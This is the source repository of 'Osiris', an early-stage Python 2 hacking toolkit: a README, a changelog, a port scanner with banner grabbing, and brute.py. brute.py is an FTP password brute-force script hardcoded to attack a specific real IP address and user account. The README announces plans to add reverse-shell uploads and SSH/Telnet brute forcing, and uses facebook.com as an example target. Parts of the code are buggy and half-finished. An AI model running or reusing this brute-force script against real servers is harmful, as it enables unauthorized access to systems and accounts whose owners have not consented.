README.md

        [01001111 01110011 01101001 01110010 01101001 01110011] 
		
	Osiris is a python tool used to scan a host looking for open ports and its services.
	Actually osiris uses sockets to stablish a connection with the target host but this will be changed soon, 
	implementing a 3way handshake for more accuraccy scanner. Also 
	Osiris provides you a force brute tool for FTP, SSH and Telnet services. 
	This tool is quite new so many facts aren't fully implemented. 
	I want Osiris to be able to upload a reverse shell on the target if a vulnerabilitie is found. 
	For making easy to configure the tool I will add attack profiles where you can customice your own kind of scanner.

Usage: 

	python ./osiris.py -u <target> [options]
	
	-u or --host <target>	IP or domain of the target to scan
	-b or --brute		Enables the brute force // Not working yet
	-f or --output <path>	Specify the output file // Not working yet
	-r or --reverse		Converts the hostname to IPv4 format (This is going to be changed)
	-h or --help		Show info about osiris
	--version		Prints the version of osiris
	
	
	Example of usage:
		
		- Execute osiris and change the output file:
		
		> python ./osiris.py -u 192.168.1.1 -f /tmp/192.168.1.1-scan.txt
	
		- Execute osiris and scans from host 5 to host 100:
		
		> python ./osiris.py -u 192.168.1.5/100 (You may have some problems on version 0.2 with this)
		
		- Execute osiris with a domain name 
		
		> python ./osiris.py -u http://www.facebook.com/ -r
		
Requeriments:
	
	Osiris is designed for Linux minds. This tool may work on Windows but many features 
	won't work properly.
	You'll need to have python2.7 installed to run this tool

Autor:

	@Sh3llmask 
	Special thanks to @someone25 :)
	
[!] Happy Hunting boyz [!]
	


CHANGELOG.txt
 ###### OSIRIS ###### 
 Current version: 0.2
 Autor: @Sh3llmask
 
 ############ CHANGELOG ############
 
 
 ### VERSION 0.2

  + Fixed reverse scanning (You don't need to use -r any more)
  + Simple banner grab implemented by socket.recv()
  + Added optparse to manage the args
  + Source code cleaned

  ### VERSION 0.3

  + Three way handshake TCP implementation
  + Option -s (stealth) added
  + FTP, SSH, Telnet brute force implemented
  + whois and dns info implemented

  ### VERSION 0.4

  + Threading implementation
  + Config file implemented
  + Save all results in a txt file (I will change this to html)


brute.py
### 	FTP FORCEBRUTE 	###
### 	OSIRIS 			###
import ftplib, sys
import time
from progressbar import *

def ftpbreaker(addr, user, passwd, i):
	try:
		con = ftplib.FTP(addr)
		con.login(user, passwd)
		con.close()
		return 1

	except Exception, error:
		return 0

	except KeyboardInterrupt:
		sys.exit()
addr ="91.134.135.18"
port ="21"
widgets = ['[>] Brute: ', Percentage(), ' ', Bar(marker='#',left='[',right=']')]
user = "ftpuser"
passwdsPath ="passwds.txt"
passwdLines = len(open(passwdsPath).readlines())
print "[>] Trying passwords for user: "+user
bar = ProgressBar(widgets=widgets, maxval=passwdLines)
passwdsFile = open(passwdsPath, 'r')
bar.start()
c=0
#t1 = datetime.now()
for passwd in passwdsFile:
	con = ftpbreaker(addr, user, passwd, c)
	c+=1
	bar.update(c)
	if con == 1:
		break
bar.finish()
#t2 = datetime.now()
#t = t2-t1
print "[!] Password found :) > "+passwd
print "[?] The brute force took: "+t


banners.py
#!/usr/bin/env python
# -*- coding: utf-8 -*-
#######################################
## BANNERS                           ##
#######################################
import random
banner1 = """


#############################################################################

    ## ##### ##  ## ####### ######### ########    ########     ## #########
   ##	    ##  ##            ##      ##      ##     ##       ##
   ##       ## ##            ##       ##     ##      ##      ##
  ##       ## ######## ##    ##       ## ## ##       ##      ######### ##
 ##       ##	      ##    ##        ##  ##         ##               ##
 ##       ##	     ##     ##        ##   ##        ##              ##
## ##### ## ########## ###########    ##    ##   ########## ##########

#############################################################################
"""
banner2 = """
             .__       .__
  ____  _____|__|______|__| ______
 /  _ \/  ___/  \_  __ \  |/  ___/
(  <_> )___ \|  ||  | \/  |\___ \
 \____/____  >__||__|  |__/____  >
           \/                  \/

"""
banner3 = """
  ______        _______. __  .______       __       _______.
 /  __  \      /       ||  | |   _  \     |  |     /       |
|  |  |  |    |   (----`|  | |  |_)  |    |  |    |   (----`
|  |  |  |     \   \    |  | |      /     |  |     \   \
|  `--'  | .----)   |   |  | |  |\  \----.|  | .----)   |
 \______/  |_______/    |__| | _| `._____||__| |_______/

"""
banner4 = """
//
//      ,----..
//     /   /   \
//    /   .     :                 ,--,                ,--,
//   .   /   ;.  \              ,--.'|      __  ,-. ,--.'|
//  .   ;   /  ` ;   .--.--.    |  |,     ,' ,'/ /| |  |,       .--.--.
//  ;   |  ; \ ; |  /  /    '   `--'_     '  | |' | `--'_      /  /    '
//  |   :  | ; | ' |  :  /`./   ,' ,'|    |  |   ,' ,' ,'|    |  :  /`./
//  .   |  ' ' ' : |  :  ;_     '  | |    '  :  /   '  | |    |  :  ;_
//  '   ;  \; /  |  \  \    `.  |  | :    |  | '    |  | :     \  \    `.
//   \   \  ',  /    `----.   \ '  : |__  ;  : |    '  : |__    `----.   \
//    ;   :    /    /  /`--'  / |  | '.'| |  , ;    |  | '.'|  /  /`--'  /
//     \   \ .'    '--'.     /  ;  :    ;  ---'     ;  :    ; '--'.     /
//      `---`        `--'---'   |  ,   /            |  ,   /    `--'---'
//                               ---`-'              ---`-'
//

"""
banner5= """
 ▒█████    ██████  ██▓ ██▀███   ██▓  ██████
▒██▒  ██▒▒██    ▒ ▓██▒▓██ ▒ ██▒▓██▒▒██    ▒
▒██░  ██▒░ ▓██▄   ▒██▒▓██ ░▄█ ▒▒██▒░ ▓██▄
▒██   ██░  ▒   ██▒░██░▒██▀▀█▄  ░██░  ▒   ██▒
░ ████▓▒░▒██████▒▒░██░░██▓ ▒██▒░██░▒██████▒▒
░ ▒░▒░▒░ ▒ ▒▓▒ ▒ ░░▓  ░ ▒▓ ░▒▓░░▓  ▒ ▒▓▒ ▒ ░
  ░ ▒ ▒░ ░ ░▒  ░ ░ ▒ ░  ░▒ ░ ▒░ ▒ ░░ ░▒  ░ ░
░ ░ ░ ▒  ░  ░  ░   ▒ ░  ░░   ░  ▒ ░░  ░  ░
    ░ ░        ░   ░     ░      ░        ░

"""
import sys, time
exitBanner = """
//     ____             _             _
//    / __ \   _____   (_)   _____   (_)   _____
//   / / / /  / ___/  / /   / ___/  / /   / ___/
//  / /_/ /  (__  )  / /   / /     / /   (__  )
//  \____/  /____/  /_/   /_/     /_/   /____/
//

"""
msg1 = "	[01001111 01110011 01101001 01110010 01101001 01110011]\n"
msg2 = "	[01001000 01100001 01100011 01101011 01101001 01101110 01100111]\n"
msg3 = "			[ No System Safe ]\n"
msg4 = "	[01000101 01111000 01110000 01101100 01101111 01101001 01110100]\n"
def bannerChoice():
	banners = [banner1,banner2,banner3,banner4,banner5,]
	msg = [msg1, msg2, msg3, msg4]
	bannerMSG = random.choice(banners) + random.choice(msg)
	clear = "\x1b[0m"
	colors = [31, 32, 33, 34, 35, 36]
	logo = bannerMSG
	for line in logo.split("\n"):
		sys.stdout.write("\x1b[1;%dm%s%s\n" % (random.choice(colors), line, clear))
		time.sleep(0.05)
def leaving():
	return exitBanner


modulos.py
import sys
import time
import os
import platform
import subprocess
import socket
import random
from banners import bannerChoice
from banners import leaving
from datetime import datetime

######## INFO ######
autor = "Sh3llm4sk"
version = "0.2"
######## BANNERS ########

banner = bannerChoice()
ext = leaving()

######## FUNCTIONS ########

def usage():
	print """
	Usage: 

	python ./osiris.py <target> [Parameters]
	
	-S [--stealth : Preform a stealth scan]
	-a [--auto : Standard parameter to scan and find vulnerabilities]
	-f [ -f (path) : Specify a path for the output file. The default directory is: /output/]
	-r [--reverse : Take a hostname as a target]
	-b [Scan the network to find devices]
	
	Example of usage:
		
		- Execute osiris and change the output file:
		
		> python ./osiris.py 192.168.1.1 -f 
	
		- Execute osiris and scans from host 5 to host 100:
		
		> python ./osiris.py 192.168.1.5/100 
		
		- Execute osiris with a domain name 
		
		> python ./osiris.py http://www.facebook.com/ -r
	"""
def iCheck():
#Initial Check
	FNULL = open(os.devnull, 'w')
	# Connectivity checking
	obt = "25.5.5.5"
	ctvt = ping(obt)
	if (ctvt == True):
		conectivity = True
	else:
		conectivity = False
	# Check modules needed to run osiris
	try:
		#First checks if the nmap is installed
		nmap = subprocess.call(['nmap','-V'], stdout=FNULL, stderr=subprocess.STDOUT)
		nmapInstalled = True
	except:
		print "[!] Nmap not installed!"
def ping(addr):
#Performs a simple ICMP Request to check if the host is up.
	ops = platform.system()
	if (ops == "Windows"): #Dectects which OS is running.
		pingCmd = "-n 1"
	elif (ops == "Linux"):
		pingCmd = "-c"
	else :
		print "[!] We couldn't detect which OS are you running. Some scans may fail"
		pingCmd = "-c"
	try:
		FNULL = open(os.devnull, 'w') #/DEV/NULL
		icmpResponse = subprocess.call(['ping',pingCmd, "1", addr], stdout=FNULL, stderr=subprocess.STDOUT)#Preforms a ping and redirect output to /dev/null
		if icmpResponse == 0:
			return True
		else:
			return False
	except KeyboardInterrupt:
		print ext
		sys.exit()	
		
def portScan(port, addr):
	#Function used to scan the listed ports and see which ones are open
	try:
		s = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
		socket.setdefaulttimeout(1)
		con = s.connect_ex((addr,port))
		if (con == 0):
			return True
		else:
			return False
		s.close()
	except KeyboardInterrupt:
		print "[!] Stopping the scanner ..."
		print ext
		sys.exit()
	except socket.error:
		print "[!] Couldn't connect to the server"
def randomIP(net):
	byte4 = random.randrange(1,254)
	scr_addr = net+byte4
	return scr_addr
def cloudFlare():
#Resolves the real IP of a site
	return
	
######### VARIABLES ########

targets = [] 	# A list of targets to scan
targetsUp = [] 	# All the hosts up
ports = [21,22,25,53,80,139,443,445,1080,3128,8080,8081]	# List of ports to scan
openPorts = [] 	# List of open ports 
# outputFile = "/output/"+sys.argv[1]+".txt"
pingConfirm = False

if len(sys.argv)<2:
	usage()
	print ext
	sys.exit()
else:
	address = sys.argv[1]
	iCheck()
	
############# ARGUMENTS IDENTIFICATION ############

if "/" in address: # If there's a slash on the IP this will check all the targets
	pingConfirm = False
	addS = address.split("/")
	ip = addS[0]
	hostRange = int(addS[1]) 
	netS = ip.split(".")
	net = netS[0]+"."+netS[1]+"."+netS[2]+"."
	firstIP = int(netS[3])
	for su in range(firstIP, hostRange):
		addr = net+str(su)
		targets.append(addr) #Stores the IPs in the targets list
elif("-r"in sys.argv)or("--reverse"in sys.argv):
	# If the host is provided by a domain address 
	# Converts the hostname to IPv4 format
	ipv4 = socket.gethostbyname(address)
	print "[?] The domain: "+address+" seems to be: "+ipv4
	targets.append(address)
elif("-fk"in sys.argv) or ("--fake"in sys.argv):
	fakeIP = randomIP(net)
elif("-f"in sys.argv):
	#Output file
	pwd = subprocess.call(['pwd'])
	print "[?] Current output location: "+str(pwd)+"/output/"
	outputFileD = raw_input("[?] Do you want to specify a new output directory?(Y/N): ")
	if ((outputFileD=="y")or(outputFileD=="Y")):
		outputFile = raw_input("[>] Specify the path of the new output file: ")
		print "[!] New output file set to: " +outputFile
	else: 
		pass	
else:
	targets.append(address)
ct = len(targets)		
if ct != 0: # If there is no targets the program will finish
	print "[?] The number of: "+str(ct)+" hosts are going to be scanned."
else:
	print "[!] No targets found"
	print ext
	sys.exit()
ti1 = datetime.now()

######### ICMP Request #########

for t in targets:
	icmp = ping(t)
	if icmp == True: #If we have a ICMP Response the host will be up. The current target of the loop will be stored in targetsUp
		print "[!] The host "+t+" is up!"
		targetsUp.append(t)
	else:
		print "[>] The host "+t+" is down!"
		if pingConfirm == True: # If we are going to scan multiple hosts this option might be disabled
			quitPing = raw_input("[?] Do you want to (T)try again or (E)exit? (T/E): ")
			if ((quitPing == "T")or(quitPing=="t")):
				ping(t)
			elif ((quitPing=="E")or(quitPing=="e")):
				print ext
				sys.exit()
			else:
				print "[!!] Something went wrong... Exiting..."
				print ext
				sys.exit()
ti2 = datetime.now()
tit = ti2 -ti1
print "[?] The number of "+str(ct)+" hosts have been pinged in "+str(tit)
time.sleep(1)

############# PORT SCAN ##############

ts1 = datetime.now()
print "[>] Starting port scanner at: ", ts1
for i in targetsUp:
	print "[>] Scannig the target: " + i 
	print "_"*60
	print ""
	for port in ports:
		ptrscn = portScan(port, i)
		if ptrscn == True:
			print "[|] "+str(i)+":"+str(port)+"		- OPEN"
			openPorts.append(port)
		else:
			print "[-] "+str(i)+":"+str(port)+"		- CLOSED"
	print ""
	print "*"*60
	oPts = len(openPorts)
	if oPts == 0:
		print "[!] No open ports!"
	elif oPts > 0:
		print "[?] We have discovered "+str(oPts)+" open ports"
ts2 = datetime.now()
tst = ts2 - ts1
print "\n[?] The scanner took: ", tst, "to scan the ports"


gathering.py
#!/usr/bin/env python2.7
# -*- coding: utf-8 -*-
###########################################
######### INFORMATION #####################
######### GATHERING   ###### v0.1 #########
###########################################
# Autor: @Sh3llm4sk                       #
###########################################
autor = "sh3llm4sk"
version = "0.1"

import sys
import time
import os
import platform
import subprocess
from argparse import ArgumentParser
import socket
from banners import bannerChoice
from banners import leaving
from datetime import datetime
banner = bannerChoice()
help = """
	Usage description: 
	-S [--stealth : Preform a stealth scan]
	-a [--auto : Standard parameter to scan and find vulnerabilities]
	-f [ -f (path) : Specify a path for the output file]
	-R [--reverse : Take a hostname as a target]
	
	Example of usage:
	python ./osiris.py <target> [Parameters]
"""
ports = [21,22,25,53,80,139,443,445,1080,3128,8080,8081]
openPorts = []
closedPorts = []
# #Argument set
# argparse = argparse.ArgumentParser()
# #	version ='0.1',
# #	description='OSIRIS us a automatic network scan which uses nmap and other tools to preform a deep scan of a target IP'
# #)
# parser.add_argument('-a', '--auto', help="Preforms a standar scan on the IP target")
# parser.add_argument('-s', '--stealth', help='Set the scan mode to stealth')
# parser.add_argument('-f', '--file', type=str, help='Specify the path of the output txt file')
# parser.add_argument('-o', '--objective', help='Specify the IP address of the target')
# args = parser.parse_args()
#The checker function is used to confirm if all the needed packages are installed
ext = leaving()
def checker():
	#Checker function is used to check all the needed things to run this tool
	FNULL = open(os.devnull, 'w')
	try:
		#First checks if the nmap is installed
		nmap = subprocess.call(['nmap','-V'], stdout=FNULL, stderr=subprocess.STDOUT)
		nmapInstalled = True
		print "[>] Nmap already installed"
	except:
		print "[>] Installing nmap..."
		nmapInst = raw_input("[?] Do you want to proceed?(Y/N): ")
		if ((nmapInst == "Y") or (nmapInst =="y")):
			print "[?] Installing..."
			nmapInstalled = True
		elif ((nmapInst == "N")or(nmapInst == "n")):
			print "[!] - You need nmap to run this tool -\nLeaving... "
			print ext
			sys.exit()
			
		else:
			print "[!] Wrong option... Leaving!"
			sys.close
	if (nmapInstalled == True): #Check all the checkers...
		checked = True
		time.sleep(1)
	else:
		print "[!] Something went wrong with the checker\n[!] Please re-run the tool again"
		time.sleep(1)
		print ext
		sys.exit()
	time.sleep(1)

def start(argv):
#This is the main function. Starts the tool and analizes the arguments given..
	if len(sys.argv) < 2:
		print banner
		print help
		print ext
		sys.exit()
	elif "-b" in sys.argv:
		print "-b option selected"
	else:
		print banner
		checker()
			
def icmpRequest(IP):
#Performs an ICMP Request to check if the host is up
	#Identify the operating system running
	ops = platform.system()
	if (ops == "Windows"):
		pingCmd = "n 1"
		# print "[!] Only for Linux minds."
		# print ext
		# sys.exit()
	elif (ops == "Linux"):
		pingCmd = "-c 1 "
	else :
		pingCmd = "-c 1 "
	for i in IP:
		print "[>] Checking if the host " + i + " is up! " 
		try:
			FNULL = open(os.devnull, 'w')
			icmpResponse = subprocess.call(['ping',  i], stdout=FNULL, stderr=subprocess.STDOUT)
			if icmpResponse == 0:
				print "[!] The host is up!"
				time.sleep(1)			
			else:
				print "[>] The host is down!"
				quitPing = raw_input("[?] Do you want to (T)try again or (E)exit? (T/E): ")
				time.sleep(1)
				if ((quitPing == "T")or(quitPing=="t")):
					icmpRequest(IP)
				elif ((quitPing=="E")or(quitPing=="e")):
					print ext
					sys.exit()
				else:
					print "[!!] Something went wrong... Exiting..."
					print ext
					sys.exit()
		except KeyboardInterrupt:
			print ext
			sys.exit()
#def networkScan():
	#Search the network for avaliable hosts
def portChecker(ports, IP):
	#This function creates a socket and scans each port of the "ports" list
	#Finally prints the status of each port
	t1 = datetime.now()
	print "[>] Starting port scanner at: ", t1
	try:
		for i in IP:
			print "[>] Scannig the target: " + i 
			print "_"*60
			print ""
			for port in ports:
				s = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
				socket.setdefaulttimeout(1)
				portscan = s.connect_ex((i,port))
				if (portscan == 0):
					print "[|] "+str(i)+":"+str(port)+"	- OPEN"
					openPorts.append(port)
				else:
					print "[-] "+str(i)+":"+str(port)+"	- CLOSED"
				s.close()
	except KeyboardInterrupt:
		print "[?] Stopping the scanner ..."
		print ext
		sys.exit()
	except socket.error:
		print "[!] Couldn't connect to the server"
	t2 = datetime.now()
	tt = t2 - t1
	print "\n[?] The scanner took: ", tt, "to scan the ports"
	
# if (sys.argv == "-r") or (sys.argv == "--reverse"):
			# If the host is provided by a domain address 
			# Converts the hostname to IPv4 format
			# ipv4 = socket.gethostbyname('sys.argv[1]')
			# targetIP = ipv4				
start(sys.argv)
IP = [sys.argv[1]]
outputFile = "/output/"+sys.argv[1]+".txt"
icmpRequest(IP)
portChecker(ports, IP)


osiris.py
#!/usr/bin/env python

import sys, time, os, platform, subprocess, socket, random
from optparse import OptionParser
from banners import bannerChoice
from banners import leaving
from datetime import datetime

######## INFO ######
autor = "Sh3llm4sk"
version = "0.2"
######## BANNERS ########

banner = bannerChoice()
ext = leaving()

######## FUNCTIONS ########


examples = """
	Example of usage:

		- Execute osiris and change the output file:

		> python ./osiris.py 192.168.1.1 -f

		- Execute osiris and scans from host 5 to host 100:

		> python ./osiris.py 192.168.1.5/100

		- Execute osiris with a domain name

		> python ./osiris.py www.facebook.com
	"""
def ping(addr):
#Performs a simple ICMP Request to check if the host is up.
	ops = platform.system()
	if (ops == "Windows"): #Dectects which OS is running.
		pingCmd = "-n 1"
	elif (ops == "Linux"):
		pingCmd = "-c"
	else :
		print "[!] We couldn't detect which OS are you running. Some scans may fail"
		pingCmd = "-c"
	try:
		FNULL = open(os.devnull, 'w') #/DEV/NULL
		icmpResponse = subprocess.call(['ping',pingCmd, "1", addr], stdout=FNULL, stderr=subprocess.STDOUT)#Preforms a ping and redirect output to /dev/null
		if icmpResponse == 0:
			return True
		else:
			return False
	except KeyboardInterrupt:
		print ext
		sys.exit()
def IPresolver(addr):
    # Resolve the IP address
	try:
		ipv4 = socket.gethostbyname(addr)
	except:
		print addr +": Unknown host"
	try:
		ipv4 = socket.gethostbyaddr(addr)
		print ipv4
	except:
		print ipv4
def portScan(port, addr):
	#Function used to scan the listed ports and see which ones are open
	try:
		s = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
		socket.setdefaulttimeout(1)
		con = s.connect_ex((addr,port))
		if (con == 0):
			return True
		else:
			return False
		s.close()
	except KeyboardInterrupt:
		print "[!] Stopping the scanner ..."
		print ext
		sys.exit()
	except socket.error:
		print "[!] Couldn't connect to the server"
def bannerGrab (addr, port):
	# Simple banner grab (This is going to be changed soon)
	try:
		s = socket.socket()
		s.connect((addr, port))
		msg = ""
		while len(msg) < 256:
			chunk = s.recv(100)
			introduction = "[+]=========[-]> "
			buf = introduction + chunk
			msg = msg + "\n" + buf
		return msg
	except:
		return "[+]=========[!]> Couldn't connect to the server\n[|]"


def randomIP(net):
	byte4 = random.randrange(1,254)
	scr_addr = net+byte4
	return scr_addr

######### VARIABLES ########

targets = [] 	# A list of targets to scan
targetsUp = [] 	# All the hosts up
# portsFile = open('ports.txt', 'r').readlines
ports = [21, 22, 23, 25, 49, 53, 80, 115, 137, 139, 156, 161, 194, 443, 546, 8080]
openPorts = [] 	# List of open ports
# outputFile = "/output/"+sys.argv[1]+".txt"
pingConfirm = False


### PARSER ###

usage = "usage: %prog -u <Target IP> [options]"
parser = OptionParser(usage=usage)
parser.add_option("-u", "--host", dest="Host", help="IP or domain of the target to scan")#, metavar="<IP>")
parser.add_option("-b", "--brute", action="store_true", dest="bruteForce", default=False, help="Use this option to enable brute force")
parser.add_option("-f", "--output", dest="outputFile", help="Specify the output path")
(options, args) = parser.parse_args()


if len(sys.argv) < 2:
	print "No enough arguments gievn"
	print examples
	sys.exit()
elif options.Host == " ":
	print "You must specify a target"
	sys.exit()
else:
	address = options.Host

############# ARGUMENTS IDENTIFICATION ############

if "/" in address: # If there's a slash on the IP this will check all the targets
	pingConfirm = False
	addS = address.split("/")
	ip = addS[0]
	hostRange = int(addS[1])
	netS = ip.split(".")
	net = netS[0]+"."+netS[1]+"."+netS[2]+"."
	firstIP = int(netS[3])
	for su in range(firstIP, hostRange):
		addr = net+str(su)
		targets.append(addr) #Stores the IPs in the targets lelif("-r"in sys.argv)or("--reverse"in sys.argv):
if(options.outputFile):
	#Output file
	pwd = subprocess.call(['pwd'])
	print "[?] Current output location: "+str(pwd)+"/output/"
	outputFileD = raw_input("[?] Do you want to specify a new output directory?(Y/N): ")
	if ((outputFileD=="y")or(outputFileD=="Y")):
		outputFile = raw_input("[>] Specify the path of the new output file: ")
		print "[!] New output file set to: " +outputFile
		targets.append(address)
	else:
		pass
		targets.append(address)
IPresolver(address)
targets.append(address)
ct = len(targets)
if ct != 0: # If there is no targets the program will finish
	print "[?] The number of: "+str(ct)+" hosts are going to be scanned."
else:
	print "[!] No targets found"
	print ext
	sys.exit()

######### ICMP Request #########

ti1 = datetime.now()
for t in targets:
	icmp = ping(t)
	if icmp == True: #If we have a ICMP Response the host will be up. The current target of the loop will be stored in targetsUp
		print "[!] The host "+t+" is up!"
		targetsUp.append(t)
	else:
		print "[>] The host "+t+" is down!"
		if pingConfirm == True: # If we are going to scan multiple hosts this option might be disabled
			quitPing = raw_input("[?] Do you want to (T)try again or (E)exit? (T/E): ")
			if ((quitPing == "T")or(quitPing=="t")):
				ping(t)
			elif ((quitPing=="E")or(quitPing=="e")):
				print ext
				sys.exit()
			else:
				print "[!!] Something went wrong... Exiting..."
				print ext
				sys.exit()
ti2 = datetime.now()
tit = ti2 -ti1
print "[?] The number of "+str(ct)+" hosts have been pinged in "+str(tit)
time.sleep(1)

############# PORT SCAN ##############

ts1 = datetime.now()
print "[>] Starting port scanner at: ", ts1
for i in targetsUp:
	print "[>] Scannig the target: " + i
	print "_"*60
	print ""
	for port in ports:
		ptrscn = portScan(port, i)
		if ptrscn == True:
			print "[|] "+str(i)+":"+str(port)+"/TCP	- OPEN"
			openPorts.append(port)
			print bannerGrab(i, port)
		else:
			print "[-] "+str(i)+":"+str(port)+"		- CLOSED\n[|]"
	print ""
	print "*"*60
	oPts = len(openPorts)
	if oPts == 0:
		print "[!] No open ports!"
	elif oPts > 0:
		print "[?] We have discovered "+str(oPts)+" open ports"
ts2 = datetime.now()
tst = ts2 - ts1
print "\n[?] The scanner took: ", tst, "to scan the ports"

